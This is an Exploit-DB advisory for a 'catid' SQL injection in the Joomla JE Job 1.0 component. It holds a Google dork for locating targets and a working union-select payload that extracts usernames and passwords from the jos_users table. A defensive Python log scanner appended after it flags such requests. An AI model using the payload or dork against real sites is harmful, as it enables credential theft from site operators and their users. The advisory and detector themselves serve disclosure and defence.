Joomla! Component JE Job 1.0 – ‘catid’ SQL Injection

  • Author: v3n0m
    Date: 2010-05-28
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/12782/
  • -----------------------------------------------------------------------
    Joomla Component com_jejob 1.0 (catid) SQL Injection Vulnerability
    -----------------------------------------------------------------------
    Author	: v3n0m
    Site	: http://yogyacarderlink.web.id/
    Date		: May, 29-2010
    Location	: Jakarta, Indonesia
    Time Zone	: GMT +7:00
    ----------------------------------------------------------------
    
    Affected software description:
    ~~~~~~~~~~~~~~~~~~~~~~~~~~
     
    Application : JE Job
    Vendor: http://joomlaextensions.co.in/
    License : GPLv2
    Version : 1.0 (lower versions may also be affected)
    Google Dork : inurl:com_jejob
     
    Users can search for jobs by Location, by Job Title or by Experience. Users can
    also see the job categories on the front page, where jobs are displayed category-wise.
    ----------------------------------------------------------------
    
    Exploitz:
    ~~~~~~~
    -9999+union+all+select+1,group_concat(username,char(58),password)v3n0m,3,4,5+from+jos_users--
    
    
    SQLi p0c:
    ~~~~~~~
    
    http://127.0.0.1/[path]/index.php?option=com_jejob&view=item&catid=[SQLi]
    ----------------------------------------------------------------
    
    Shoutz:
    ~~~~
    
    - 'malingsial talks too much, you skill off bullshit on '
    - LeQhi,lingah,GheMaX,spykit,m4rco,z0mb13,ast_boy,eidelweiss,xx_user,^pKi^,tian,zhie_o,JaLi-
    - setanmuda,oche_an3h,onez,Joglo,d4rk_kn19ht,Cakill Schumbag
    - kiddies,whitehat,mywisdom,yadoy666,udhit
    - c4uR (next time you pour your heart out, don't cry again, uR, bruakakaka)
    - BLaSTER & TurkGuvenligi & Agd_scorp (Turkey Hackers)
    - elicha cristia [ Mizz U so much... ]
    - Joss [at] hack0wn.com
    - #yogyacarderlink @irc.dal.net
    ----------------------------------------------------------------
    Contact:
    ~~~~
    
    v3n0m | YOGYACARDERLINK CREW | v3n0m666[at]live[live]com
    Homepage: http://yogyacarderlink.web.id/
    	http://v3n0m.blogdetik.com/
    	http://elich4.blogspot.com/ << Come on, update >_<
    
    ---------------------------[EOF]--------------------------------
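
An added example, not part of the original advisory: a log check that flags `com_jejob` requests whose `catid` is not a plain integer, which is the shape of the injection point shown above. The log lines are constructed, and the rule that a legitimate `catid` is a non-negative integer is an assumption about the component.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Constructed access-log lines (combined log format); not taken from the advisory.
SAMPLE_LOG = [
    '203.0.113.5 - - [29/May/2010:10:00:01 +0700] "GET /index.php?option=com_jejob&view=item&catid=3 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [29/May/2010:10:00:07 +0700] "GET /index.php?option=com_jejob&view=item&catid=-9999+union+all+select+1,2,3,4,5-- HTTP/1.1" 200 812',
    '203.0.113.7 - - [29/May/2010:10:00:09 +0700] "GET /index.php?option=com_content&view=article&id=7&catid=x HTTP/1.1" 200 900',
    '198.51.100.4 - - [29/May/2010:10:00:12 +0700] "GET /index.php?option=com_jejob&view=item&catid=-9999%2520union%2520all%2520select%25201,2,3,4,5-- HTTP/1.1" 200 812',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate category id is a short, non-negative integer.
INT_RE = re.compile(r'\d{1,10}')


def suspicious_catid(line):
    """Return the decoded catid if this is a com_jejob request with a
    non-integer catid, otherwise None."""
    match = REQUEST_RE.search(line)
    if not match:
        return None
    # parse_qs percent-decodes once and turns '+' into spaces.
    params = parse_qs(urlsplit(match.group(1)).query)
    if 'com_jejob' not in params.get('option', []):
        return None  # only the affected component is in scope
    for value in params.get('catid', []):  # every repeated catid is checked
        value = unquote_plus(value)  # second decode catches double encoding
        if not INT_RE.fullmatch(value.strip()):
            return value
    return None


def scan(lines):
    """Return (client_ip, decoded_catid) for every flagged log line."""
    hits = []
    for line in lines:
        value = suspicious_catid(line)
        if value is not None:
            hits.append((line.split()[0], value))
    return hits


if __name__ == '__main__':
    for ip, value in scan(SAMPLE_LOG):
        print(f'{ip}: non-integer catid {value!r}')
```

The same integer-only rule, enforced in the component before the value reaches the query, is what closes the injection point; the log check only finds attempts.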